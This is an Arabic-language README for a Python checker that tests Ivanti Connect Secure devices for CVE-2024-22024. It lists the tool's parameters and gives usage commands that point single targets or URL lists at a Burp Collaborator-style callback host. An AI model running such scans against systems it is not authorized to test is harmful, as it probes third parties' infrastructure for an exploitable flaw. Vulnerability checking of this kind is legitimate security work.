نظرة عامة
نظرة عامة
CVE-2024-22024
التحقّق من وجود الثغرة CVE-2024-22024 في أجهزة Ivanti Connect Secure.
المعاملات
-uأو--target_url: عنوان جهاز Ivanti Connect Secure (ICS) المستهدف، أو ملفٌّ يحتوي على قائمة بالعناوين.-cأو--attacker_url: عنوان المهاجم (يمكنك توليده باستخدام Burp Collaborator أو ngrok، أو عبر رابط فريد من Webhook.site).-tأو--timeout: مهلة الطلب بالثواني (القيمة الافتراضية 3 ثوانٍ).
طريقة الاستخدام
اختبار عنوان واحد:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
اختبار قائمة من العناوين:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
استخدام مهلة مختلفة (5 ثوانٍ):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
شكر وتقدير
الشكر لمن اكتشف الثغرة.. أما أنا فقد قرأتُ إثبات المفهوم (PoC) وأتمتُّ هذه الأداة فحسب.